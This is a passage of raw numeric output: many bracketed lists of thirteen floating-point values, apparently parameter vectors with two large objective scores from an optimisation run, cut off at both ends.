8.705169785374419e-16, 2.4957985197946978e-05, -1.7997194394724915e-06,\n -1.836034443165441e-08, 9.087619653117874e-10, 183710210581.81177, \n 101076246798.6337]\n[-8.372802930516975e-10, -1.3359785407261977e-12, 
-1.9531413192683389e-13, \n 4.869384519400452e-11, -1.432701673757514e-10, -1.8130493256774034e-15,\n 8.765174154706532e-16, 2.542150809952725e-05, -1.7997194394724915e-06, \n -1.850709631603352e-08, 9.087619653117874e-10, 168715457724.7375, \n 101683114493.3993]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.849645416672899e-11, -1.432701673757514e-10, -1.803543054789903e-15, \n 8.765174154706532e-16, 2.5177177276929545e-05, -1.7997194394724915e-06,\n -1.836034443165441e-08, 9.087619653117874e-10, 153789626574.96255, \n 105699410466.83022]\n[-8.372802930516975e-10, -1.3398025228100945e-12, -1.9531413192683389e-13, \n 4.855683396544643e-11, -1.4675478300173032e-10, -1.803543054789903e-15,\n 8.714032924475303e-16, 2.4957985197946978e-05, -1.793948394990656e-06, \n -1.836034443165441e-08, 9.081976758127089e-10, 159560429502.34207, \n 105861289429.36061]\n[-8.372802930516975e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.869384519400452e-11, -1.432701673757514e-10, -1.7864100157215748e-15,\n 8.765174154706532e-16, 2.5177177276929545e-05, -1.7997194394724915e-06,\n -1.836034443165441e-08, 9.087619653117874e-10, 147461834890.53723, \n 106068644665.40553]\n[-8.372802930516975e-10, -1.3292316984383345e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4760843266911815e-10, -1.7864100157215748e-15,\n 8.706272486016714e-16, 2.492800478197597e-05, -1.7933608637070708e-06, \n -1.836034443165441e-08, 9.087979750822277e-10, 147793960453.4741, \n 109638154986.2024]\n[-8.29844666406642e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.8434260838579935e-11, -1.4561659265574012e-10, -1.819718397269023e-15,\n 8.775397316555329e-16, 2.4948775411850268e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.081976758127089e-10, 150492287670.62976, \n 114344342719.97507]\n[-8.406587076953522e-10, -1.318355348076889e-12, -1.9519777560623135e-13, \n 4.855683396544643e-11, -1.4760843266911815e-10, -1.815921924023075e-15,\n 
8.839563844754409e-16, 2.4957985197946978e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.081976758127089e-10, 148227079557.78632, \n 115101067854.31332]\n[-8.389236670603421e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15,\n 8.717072130867646e-16, 2.4957985197946978e-05, -1.7900208911755532e-06,\n -1.836034443165441e-08, 9.087619653117874e-10, 137339476236.27339, \n 120797794814.05704]\n[-8.373514643167848e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15,\n 8.705169785374419e-16, 2.492800478197597e-05, -1.786297491730252e-06, -\n 1.836034443165441e-08, 9.087619653117874e-10, 128365631923.39072, \n 133721716481.47603]\n[-8.361552586353477e-10, -1.3359785407261977e-12, -1.9531413192683389e-13, \n 4.852404641399239e-11, -1.4675478300173032e-10, -1.799249889019179e-15,\n 8.705169785374419e-16, 2.483403849637781e-05, -1.783565701728919e-06, -\n 1.836034443165441e-08, 9.095300241628919e-10, 123047993752.2489, \n 147005409641.27127]\n[-9.129396902499863e-10, -1.290047843436073e-12, -2.702634930634393e-13, \n 4.58556551164694e-11, -1.8724359625458014e-10, -2.1792166675464865e-15,\n 9.365717147446797e-16, 1.8994698205972217e-05, -1.8050933870374392e-06,\n -1.3360134446642706e-08, 8.693561802236366e-10, 169675879824.58978, \n 156722470654.13324]\n[6.303262263534727e-10, -1.2096663849982051e-12, -2.5988950272728827e-13, \n 4.701662665204773e-11, -1.4934765549498044e-10, -2.0495920936053975e-15,\n 8.502785255135087e-16, 1.8814769194136882e-05, -1.8050933870374392e-06,\n -1.3247752346374906e-08, 8.693561802236366e-10, 108072398467.48868, \n 167972224844.19583]\n[6.303262263534727e-10, -1.2096663849982051e-12, -2.5988950272728827e-13, \n 4.701662665204773e-11, -1.4986345441105813e-10, -2.0495920936053975e-15,\n 8.502785255135087e-16, 1.8814769194136882e-05, -1.8050933870374392e-06,\n -1.3247752346374906e-08, 
8.693561802236366e-10, 108072398467.75635, \n 167972224843.92523]\n[-9.212545260772544e-10, -1.290047843436073e-12, -1.8356995493902235e-13, \n 4.58556551164694e-11, -1.8724359625458014e-10, -2.1913589342035502e-15,\n 9.365717147446797e-16, 1.9540146753875297e-05, -1.8050933870374392e-06,\n -1.3360134446642706e-08, 8.693561802236366e-10, 117723326371.03189, \n 192873830899.82352]\n[6.303262263534727e-10, -1.290047843436073e-12, -2.5988950272728827e-13, \n 4.58556551164694e-11, -1.4986345441105813e-10, -2.1913589342035502e-15,\n 8.502785255135087e-16, 1.8814769194136882e-05, -1.8050933870374392e-06,\n -1.3247752346374906e-08, 8.693561802236366e-10, 164354464752.25952, \n 160840990423.46024]\n[6.354744988103506e-10, -1.2096663849982051e-12, -1.830526663998671e-13, \n 4.6589669053151376e-11, -1.4986345441105813e-10, -\n 2.0495920936053975e-15, 8.502785255135087e-16, 1.894858193847651e-05, -\n 1.8050933870374392e-06, -1.3247752346374906e-08, 8.693561802236366e-10,\n 96467208837.94556, 179586543004.98117]\n[-9.212545260772544e-10, -1.290047843436073e-12, -1.8356995493902235e-13, \n 4.58556551164694e-11, -1.8580228849463816e-10, -2.1913589342035502e-15,\n 9.365717147446797e-16, 1.9540146753875297e-05, -1.8218396850604304e-06,\n -1.3360134446642706e-08, 8.759216763039946e-10, 117765020064.66293, \n 187118262382.8758]\n[-9.129396902499863e-10, -1.3004166005044262e-12, -1.8356995493902235e-13, \n 4.58556551164694e-11, -1.8724359625458014e-10, -2.1913589342035502e-15,\n 9.365717147446797e-16, 1.962681376929987e-05, -1.8050933870374392e-06, \n -1.3418860642065019e-08, 8.693561802236366e-10, 122674650037.46736, \n 187415567631.77402]\n[-9.212545260772544e-10, -1.2799153483071088e-12, -1.8213920664100724e-13, \n 4.58556551164694e-11, -1.8724359625458014e-10, -2.1913589342035502e-15,\n 9.365717147446797e-16, 1.9540146753875297e-05, -1.8050933870374392e-06,\n -1.3360134446642706e-08, 8.693561802236366e-10, 117723326371.03189, \n 192873830899.82352]\n[-9.212545260772544e-10, 
-1.290047843436073e-12, -1.8356995493902235e-13, \n 4.6154548476823616e-11, -1.8724359625458014e-10, -\n 2.1913589342035502e-15, 9.358479354640953e-16, 1.9540146753875297e-05, \n -1.8050933870374392e-06, -1.3360134446642706e-08, 8.693561802236366e-10,\n 117723326371.02731, 192873830899.82806]\n[2.2152115305769157e-10, -1.6907719215642795e-12, -2.5108769063589337e-13, \n 4.9793760275117476e-11, -2.0780774158604122e-10, -\n 2.1593626664102876e-15, 8.836470142939426e-16, 2.0200374650352852e-05, \n -1.7639524821935923e-06, -1.5013783998899997e-08, 8.77876424822685e-10,\n 170388218306.66492, 168925348515.4128]\n[2.2152115305769157e-10, -1.6907719215642795e-12, -2.1051647732787472e-13, \n 4.9793760275117476e-11, -2.0780774158604122e-10, -\n 2.1790706433018085e-15, 8.836470142939426e-16, 2.0343533479720338e-05, \n -1.7639524821935923e-06, -1.5091093694835327e-08, 8.771058818345121e-10,\n 191821821495.1242, 158798904598.69617]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -2.1593626664102876e-15,\n 8.836470142939426e-16, 2.0217203662255432e-05, -1.7639524821935923e-06,\n -1.5013783998899997e-08, 8.771058818345121e-10, 177069079234.4985, \n 163375067226.8736]\n[2.213664545134999e-10, -1.2059133330572482e-12, -2.5108769063589337e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -2.1593626664102876e-15,\n 8.836470142939426e-16, 2.0200374650352852e-05, -1.7639524821935923e-06,\n -1.508245699810314e-08, 8.771058818345121e-10, 197879714583.27084, \n 152444791757.7255]\n[0.0, -1.223723210207519e-12, -2.1051647732787472e-13, \n 4.971358693780409e-11, -1.7352085678160897e-10, -2.165433707987142e-15,\n 7.304553415989529e-16, 2.0047355685146273e-05, -1.7657604268720381e-06,\n -1.4977385439375226e-08, 8.771058818345121e-10, 197945074606.02325, \n 153164597685.87036]\n[2.2152115305769157e-10, -1.1984578022968498e-12, -2.5108769063589337e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, 
-1.8426407940693324e-15,\n 7.430575474541962e-16, 2.0200374650352852e-05, -1.7639524821935923e-06,\n -1.5202351660972107e-08, 8.771058818345121e-10, 111986329581.05826, \n 155849166742.8801]\n[2.2133713135172913e-10, -1.2059133330572482e-12, -2.5107145183244764e-13, \n 5.011120217163613e-11, -1.724660990140153e-10, -2.1790706433018085e-15,\n 8.836470142939426e-16, 2.0200374650352852e-05, -1.7639524821935923e-06,\n -1.5013783998899997e-08, 8.771058818345121e-10, 187269085984.5673, \n 161472427331.15216]\n[0.0, -1.223723210207519e-12, -2.094909506024221e-13, 5.011120217163613e-11,\n -1.7677981323511262e-10, -2.145058695065051e-15, 7.430575474541962e-16,\n 2.0053347897812537e-05, -1.7639524821935923e-06, -\n 1.4682044872577598e-08, 8.728626586100963e-10, 152433850624.54852, \n 175966043507.07343]\n[0.0, -1.223723210207519e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -2.1790706433018085e-15,\n 7.430575474541962e-16, 1.9918519209106862e-05, -1.7685796144533914e-06,\n -1.4682044872577598e-08, 8.771058818345121e-10, 153535961138.3572, \n 184829802626.36642]\n[2.2152115305769157e-10, -1.200937983572784e-12, -2.1065990049856794e-13, \n 5.011120217163613e-11, -1.7420072583381303e-10, -1.8426407940693324e-15,\n 7.454251311051652e-16, 2.0200374650352852e-05, -1.7639524821935923e-06,\n -1.508245699810314e-08, 8.771058818345121e-10, 92670242378.77588, \n 189416231139.84406]\n[0.0, -1.2207456906260254e-12, -2.1065990049856794e-13, \n 4.9793760275117476e-11, -2.0772853669541976e-10, -\n 1.8426407940693324e-15, 7.430575474541962e-16, 1.9867416915370552e-05, \n -1.7639524821935923e-06, -1.5091093694835327e-08, 8.728626586100963e-10,\n 160631139543.06137, 122019730569.7476]\n[2.2152115305769157e-10, -1.1984578022968498e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7677981323511262e-10, -1.857281675942834e-15,\n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.5202351660972107e-08, 8.771058818345121e-10, 
153487531028.94116, \n 128597452665.91768]\n[0.0, -1.2031098015567e-12, -2.5161591646068603e-13, 5.011120217163613e-11,\n -1.7849498396021264e-10, -1.82610373802557e-15, 7.430575474541962e-16, \n 1.981538293869461e-05, -1.7639524821935923e-06, -1.5202351660972107e-08,\n 8.771058818345121e-10, 142632578694.80914, 130195065921.46504]\n[2.2152115305769157e-10, -1.2003583976149596e-12, -2.5108769063589337e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.8426407940693324e-15,\n 7.430575474541962e-16, 2.0200374650352852e-05, -1.7639524821935923e-06,\n -1.517941226634992e-08, 8.771058818345121e-10, 107861636975.64659, \n 161449199082.99103]\n[0.0, -1.223723210207519e-12, -2.094909506024221e-13, 5.011120217163613e-11,\n -1.7677981323511262e-10, -1.857281675942834e-15, 7.430575474541962e-16,\n 1.981538293869461e-05, -1.769936435419886e-06, -1.4682044872577598e-08,\n 8.728626586100963e-10, 100156348461.68698, 161778485371.36353]\n[0.0, -1.1984578022968498e-12, -2.1065990049856794e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.8426407940693324e-15,\n 7.430575474541962e-16, 2.0200374650352852e-05, -1.7639524821935923e-06,\n -1.5091093694835327e-08, 8.760544278271184e-10, 100072993312.46272, \n 171303112707.4717]\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.088572649745598e-13, \n 4.9793760275117476e-11, -1.7352085678160897e-10, -\n 1.8261648304268637e-15, 8.836470142939426e-16, 2.0343533479720338e-05, \n -1.7639524821935923e-06, -1.5202351660972107e-08, 8.771058818345121e-10,\n 97245352689.07887, 174341101475.58182]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 4.9675085987122204e-11, -1.7558160485557454e-10, -\n 1.8426407940693324e-15, 8.836470142939426e-16, 2.022642042947946e-05, -\n 1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10,\n 92503635735.71886, 182996786041.40976]\n[0.0, -1.223723210207519e-12, -2.094909506024221e-13, 5.011120217163613e-11,\n -1.7677981323511262e-10, 
-2.1612081417375267e-15, 7.470344646267989e-16,\n 2.0053347897812537e-05, -1.7639524821935923e-06, -\n 1.4645406166689473e-08, 8.730660207999707e-10, 148185335900.70355, \n 185221791801.95062]\n[2.2111462065028517e-10, -1.2207456906260254e-12, -2.1065990049856794e-13, \n 5.056589741460715e-11, -1.7420072583381303e-10, -1.8426407940693324e-15,\n 7.454251311051652e-16, 2.0200374650352852e-05, -1.7639524821935923e-06,\n -1.508245699810314e-08, 8.771058818345121e-10, 92670242378.76936, \n 189416231139.85312]\n[2.2152115305769157e-10, -1.2207456906260254e-12, -2.1065990049856794e-13, \n 5.011120217163613e-11, -1.7420072583381303e-10, -1.8276902524925885e-15,\n 8.836470142939426e-16, 2.0200374650352852e-05, -1.7639524821935923e-06,\n -1.5091093694835327e-08, 8.771058818345121e-10, 90666406593.2125, \n 190153350507.14474]\n[2.2152115305769157e-10, -1.2049195466583994e-12, -2.1065990049856794e-13, \n 4.98075339514226e-11, -1.7558160485557454e-10, -1.8426407940693324e-15,\n 7.454251311051652e-16, 2.0095046248399238e-05, -1.7639524821935923e-06,\n -1.5013783998899997e-08, 8.771058818345121e-10, 89706134652.28279, \n 197738317572.1617]\n[0.0, -1.2031098015567e-12, -2.1065990049856794e-13, 5.0102593857564815e-11,\n -1.7352085678160897e-10, -1.819039898810471e-15, 7.460417812765263e-16,\n 2.0200374650352852e-05, -1.7758673160173464e-06, -\n 1.5202351660972107e-08, 8.760544278271184e-10, 160476853944.9334, \n 119035825863.27417]\n[2.2152115305769157e-10, -1.2031098015567e-12, -2.5161591646068603e-13, \n 4.9793760275117476e-11, -1.7849498396021264e-10, -1.82610373802557e-15,\n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.5344868185414675e-08, 8.771058818345121e-10, 180743589801.84604, \n 120144468135.82727]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 4.947687927376915e-11, -1.7558160485557454e-10, -1.8426407940693324e-15,\n 8.836470142939426e-16, 2.04140411384885e-05, -1.7639524821935923e-06, -\n 
1.5078308038358913e-08, 8.683463468773267e-10, 146622662638.346, \n 120359956158.03543]\n[0.0, -1.1984578022968498e-12, -2.094909506024221e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.857281675942834e-15,\n 7.430575474541962e-16, 2.0200374650352852e-05, -1.7813149517985466e-06,\n -1.5091093694835327e-08, 8.760544278271184e-10, 171477577754.58575, \n 120995758664.39177]\n[2.2152115305769157e-10, -1.1984578022968498e-12, -2.5108769063589337e-13, \n 4.9967768219433575e-11, -1.7352085678160897e-10, -\n 1.8426407940693324e-15, 7.430575474541962e-16, 2.0200374650352852e-05, \n -1.7639524821935923e-06, -1.5091093694835327e-08, 8.703632209100975e-10,\n 151029089477.88403, 121221447183.73479]\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.088572649745598e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15,\n 7.430575474541962e-16, 2.0343533479720338e-05, -1.7639524821935923e-06,\n -1.520980077906525e-08, 8.721578527250325e-10, 139696562348.4149, \n 123962248783.03809]\n[2.233355889138985e-10, -1.2031098015567e-12, -2.5108769063589337e-13, \n 5.011120217163613e-11, -1.7849498396021264e-10, -1.8426407940693324e-15,\n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.5202351660972107e-08, 8.771058818345121e-10, 148301377250.4212, \n 129257349906.46594]\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.088572649745598e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15,\n 7.448076765658434e-16, 2.0200374650352852e-05, -1.7728642137544318e-06,\n -1.517941226634992e-08, 8.771058818345121e-10, 131981382341.97574, \n 129372470770.49553]\n[0.0, -1.2031098015567e-12, -2.088572649745598e-13, 5.011120217163613e-11, \n -1.7849498396021264e-10, -1.82610373802557e-15, 8.836470142939426e-16, \n 1.981538293869461e-05, -1.7639524821935923e-06, -1.5202351660972107e-08,\n 8.771058818345121e-10, 142632578694.80914, 130195065921.46504]\n[-5.2595470648843136e-09, -1.2003583976149596e-12, 
-2.5161591646068603e-13,\n 5.011120217163613e-11, -1.7461898455625076e-10, -1.8426407940693324e-15,\n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.517941226634992e-08, 8.771058818345121e-10, 142718091682.67987, \n 132029509845.4832]\n[2.2257852388875064e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 4.9793760275117476e-11, -1.7380412465809723e-10, -1.841021101878205e-15,\n 8.836470142939426e-16, 2.022642042947946e-05, -1.7639524821935923e-06, \n -1.5202351660972107e-08, 8.750599822793858e-10, 126150709659.35735, \n 137741348069.72827]\n[0.0, -1.2344709098355012e-12, -2.090479539659853e-13, \n 5.011120217163613e-11, -1.7849498396021264e-10, -1.857281675942834e-15,\n 7.485411998460075e-16, 1.981538293869461e-05, -1.769936435419886e-06, -\n 1.4682044872577598e-08, 8.711551918674385e-10, 114088676894.18327, \n 143862344272.2216]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7558160485557454e-10, -1.82610373802557e-15, \n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.750599822793858e-10, 119621740814.33159, \n 143868003797.30536]\n[2.2152115305769157e-10, -1.2003583976149596e-12, -2.088572649745598e-13, \n 4.995108013618423e-11, -1.7207960562590789e-10, -1.8426407940693324e-15,\n 8.836470142939426e-16, 2.015341505664753e-05, -1.7639524821935923e-06, \n -1.5202351660972107e-08, 8.771058818345121e-10, 115848531243.76457, \n 151496866956.06183]\n[7.878840270455085e-09, -1.2071709641632366e-12, -2.088572649745598e-13, \n 5.022894055850661e-11, -1.7352085678160897e-10, -1.8610445297760222e-15,\n 7.430575474541962e-16, 2.0343533479720338e-05, -1.7639524821935923e-06,\n -1.5202351660972107e-08, 8.760544278271184e-10, 113456911424.16617, \n 154679332976.7693]\n[0.0, -1.2031098015567e-12, -2.5161591646068603e-13, 5.011120217163613e-11,\n -1.7352085678160897e-10, -1.82610373802557e-15, 7.430575474541962e-16, \n 
1.983133919352831e-05, -1.7639524821935923e-06, -1.500055802123721e-08,\n 8.760544278271184e-10, 107979663117.77498, 158587944243.3901]\n[2.2152115305769157e-10, -1.2003583976149596e-12, -2.5108769063589337e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.8426407940693324e-15,\n 7.451496753853957e-16, 2.0200374650352852e-05, -1.7639524821935923e-06,\n -1.517941226634992e-08, 8.771058818345121e-10, 107861636975.64659, \n 161449199082.99103]\n[2.1977210438689425e-10, -1.2003583976149596e-12, -2.5108769063589337e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.8426407940693324e-15,\n 8.836470142939426e-16, 2.0200374650352852e-05, -1.7639524821935923e-06,\n -1.517941226634992e-08, 8.771058818345121e-10, 107861636975.64659, \n 161449199082.99103]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.099781497267347e-13, \n 4.9793760275117476e-11, -1.7558160485557454e-10, -\n 1.8426407940693324e-15, 8.836470142939426e-16, 2.0299458575301996e-05, \n -1.756844278469525e-06, -1.5202351660972107e-08, 8.750599822793858e-10,\n 101036412554.48618, 178952195751.12357]\n[0.0, -1.2071709641632366e-12, -2.088572649745598e-13, \n 4.9793760275117476e-11, -1.7352085678160897e-10, -\n 1.8426407940693324e-15, 8.836470142939426e-16, 2.0200374650352852e-05, \n -1.7587739009571313e-06, -1.5202351660972107e-08, 8.768692858683927e-10,\n 101115281125.52821, 181312381109.07834]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 4.9675085987122204e-11, -1.7558160485557454e-10, -\n 1.8426407940693324e-15, 8.836470142939426e-16, 2.022642042947946e-05, -\n 1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10,\n 92503635735.71886, 182996786041.40976]\n[2.2295275331941093e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 4.9675085987122204e-11, -1.7558160485557454e-10, -\n 1.8426407940693324e-15, 8.836470142939426e-16, 2.022642042947946e-05, -\n 1.7639524821935923e-06, -1.5013783998899997e-08, 8.750599822793858e-10,\n 
92503635735.71886, 182996786041.40976]\n[0.0, -1.223723210207519e-12, -2.1065990049856794e-13, \n 5.011120217163613e-11, -1.7707453284878416e-10, -1.866210682668369e-15,\n 7.430575474541962e-16, 1.9722774245768875e-05, -1.769936435419886e-06, \n -1.4682044872577598e-08, 8.760544278271184e-10, 88317753591.74515, \n 193403737351.61066]\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.5161591646068603e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15,\n 7.430575474541962e-16, 2.0343533479720338e-05, -1.7493239251088378e-06,\n -1.5085870105283375e-08, 8.701394499644777e-10, 90763281590.1167, \n 199093039398.6542]\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.088572649745598e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.857281675942834e-15,\n 7.387655049943961e-16, 1.981538293869461e-05, -1.769936435419886e-06, -\n 1.4563889985865401e-08, 8.644597543611974e-10, 157634872361.7637, \n 120593643708.66519]\n[2.2257852388875064e-10, -1.2070230966272908e-12, -2.1051647732787472e-13, \n 5.027931250826744e-11, -1.755220169767042e-10, -1.810973414699955e-15, \n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.5202351660972107e-08, 8.750599822793858e-10, 159354716917.0895, \n 121269083493.68436]\n[0.0, -1.2031098015567e-12, -2.090479539659853e-13, 5.011120217163613e-11, \n -1.7352085678160897e-10, -1.8577367523496564e-15, 7.430575474541962e-16,\n 1.9814643005749893e-05, -1.7639524821935923e-06, -1.500055802123721e-08,\n 8.711551918674385e-10, 168378423128.42877, 121439949900.90005]\n[2.198369754018213e-10, -1.2071709641632366e-12, -2.088572649745598e-13, \n 5.011120217163613e-11, -1.7513929529124395e-10, -1.82610373802557e-15, \n 7.448076765658434e-16, 2.0042195789951223e-05, -1.7728642137544318e-06,\n -1.5013783998899997e-08, 8.734593739302048e-10, 147068576327.25705, \n 122027384226.92]\n[2.2257852388875064e-10, -1.2059133330572482e-12, -2.090479539659853e-13, \n 4.9793760275117476e-11, 
-1.7849498396021264e-10, -1.841021101878205e-15,\n 7.556782953802372e-16, 2.022642042947946e-05, -1.769936435419886e-06, -\n 1.5202351660972107e-08, 8.750599822793858e-10, 149871632956.7388, \n 122750625888.09634]\n[2.2152115305769157e-10, -1.2344709098355012e-12, -2.1013781830316155e-13, \n 5.011120217163613e-11, -1.7343044399460855e-10, -1.857281675942834e-15,\n 7.430575474541962e-16, 2.0343113714890682e-05, -1.7639524821935923e-06,\n -1.520980077906525e-08, 8.721578527250325e-10, 151082881535.07886, \n 122935226427.98189]\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.088572649745598e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.8261648304268637e-15,\n 7.430575474541962e-16, 2.0343533479720338e-05, -1.7639524821935923e-06,\n -1.520980077906525e-08, 8.721578527250325e-10, 139696562348.4149, \n 123962248783.03809]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7380412465809723e-10, -1.82610373802557e-15, \n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.735477478457909e-10, 133427418313.38545, \n 131702579310.68652]\n[2.2152115305769157e-10, -1.2071709641632366e-12, -2.116126459765591e-13, \n 5.011120217163613e-11, -1.7558160485557454e-10, -1.8261648304268637e-15,\n 7.430575474541962e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.517941226634992e-08, 8.771058818345121e-10, 137250169853.3863, \n 133211383937.09729]\n[-9.575357968769427e-09, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7558160485557454e-10, -1.842789515995345e-15,\n 7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.750599822793858e-10, 123172560507.99263, \n 143105235055.608]\n[2.2282051950271776e-10, -1.2030336482043862e-12, -2.1171136727356646e-13, \n 5.011120217163613e-11, -1.7558160485557454e-10, -1.8261648304268637e-15,\n 7.430575474541962e-16, 1.981538293869461e-05, 
-1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.750599822793858e-10, 119639757591.69511, \n 143860615432.91934]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.0388416851351e-11, -1.7478774930028702e-10, -1.82610373802557e-15, \n 7.430575474541962e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.750599822793858e-10, 118202331336.15999, \n 145092770865.8836]\n[0.0, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.021867485100539e-11, -1.7558160485557454e-10, -1.82610373802557e-15, \n 7.503695295044637e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.5013783998899997e-08, 8.760544278271184e-10, 110377805870.9487, \n 155477031697.76462]\n[0.0, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7281503437685213e-10, -1.82610373802557e-15, \n 8.836470142939426e-16, 1.983133919352831e-05, -1.7639524821935923e-06, \n -1.500055802123721e-08, 8.760544278271184e-10, 107979663117.63412, \n 158587944243.89005]\n[0.0, -1.2031098015567e-12, -2.522559178506789e-13, 5.003845283040925e-11, \n -1.7352085678160897e-10, -1.82610373802557e-15, 7.430575474541962e-16, \n 1.9950498914670327e-05, -1.7639524821935923e-06, -1.500055802123721e-08,\n 8.760544278271184e-10, 99132279868.34593, 171185572417.85907]\n[2.2257852388875064e-10, -1.2031098015567e-12, -2.5161591646068603e-13, \n 5.011120217163613e-11, -1.7352085678160897e-10, -1.82610373802557e-15, \n 8.811799226535086e-16, 2.022642042947946e-05, -1.7639524821935923e-06, \n -1.508244156181531e-08, 8.760544278271184e-10, 93130287119.72461, \n 180430143233.58368]\n[2.2152115305769157e-10, -1.2059133330572482e-12, -2.088572649745598e-13, \n 5.011120217163613e-11, -1.7558160485557454e-10, -1.8265258253512156e-15,\n 7.430575474541962e-16, 2.0240988631290876e-05, -1.7728642137544318e-06,\n -1.5013783998899997e-08, 8.784555835692595e-10, 86927194519.4496, \n 183449646874.34637]\n[7.863427642383715e-09, -1.2031098015567e-12, 
-2.5161591646068603e-13, \n 4.9793760275117476e-11, -1.7380412465809723e-10, -1.82610373802557e-15,\n 7.430575474541962e-16, 2.022642042947946e-05, -1.7639524821935923e-06, \n -1.500055802123721e-08, 8.750599822793858e-10, 87084714365.5935, \n 191076754457.2524]\n[0.0, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7849498396021264e-10, -1.857281675942834e-15,\n 7.485411998460075e-16, 1.9750639916729973e-05, -1.769936435419886e-06, \n -1.5013783998899997e-08, 8.825388912755251e-10, 96474604776.96465, \n 194275355409.06598]\n[0.0, -1.2031098015567e-12, -2.5161591646068603e-13, 4.9793760275117476e-11,\n -1.7380412465809723e-10, -1.82610373802557e-15, 7.430575474541962e-16, \n 2.022642042947946e-05, -1.7639524821935923e-06, -1.503739318330452e-08,\n 8.760544278271184e-10, 86984982238.58047, 194967876303.00238]\n[1.5200576895768509e-09, -1.2059133330572482e-12, -2.0752021923147355e-13, \n 5.011120217163613e-11, -1.7849498396021264e-10, -1.82610373802557e-15, \n 7.479116563110691e-16, 1.981538293869461e-05, -1.7639524821935923e-06, \n -1.4682044872577598e-08, 8.724478065416361e-10, 82147238279.93182, \n 198112832281.90573]\n[2.223825616669009e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.011120217163613e-11, -1.7326944854292794e-10, -1.8261648304268637e-15,\n 7.430575474541962e-16, 2.0343533479720338e-05, -1.7639524821935923e-06,\n -1.534155691698868e-08, 8.721578527250325e-10, 175522473614.0067, \n 115813093887.0164]\n[2.2296631466270538e-10, -1.2059133330572482e-12, -2.1051647732787472e-13, \n 5.0388416851351e-11, -1.7478774930028702e-10, -1.82610373802557e-15, \n 7.430575474541962e-16, 2.0431066002844864e-05, -1.7780476812466564e-06,\n -1.5013783998899997e-08, 8.717160979795123e-10, 146919548917.9041, \n 118508631814.89664]\n[2.2152115305769157e-10, -1.2131115225525171e-12, -2.088572649745598e-13, \n 5.011120217163613e-11, -1.7478774930028702e-10, -1.82610373802557e-15, \n 7.430575474541962e-16, 1.983133919352831e-05, 
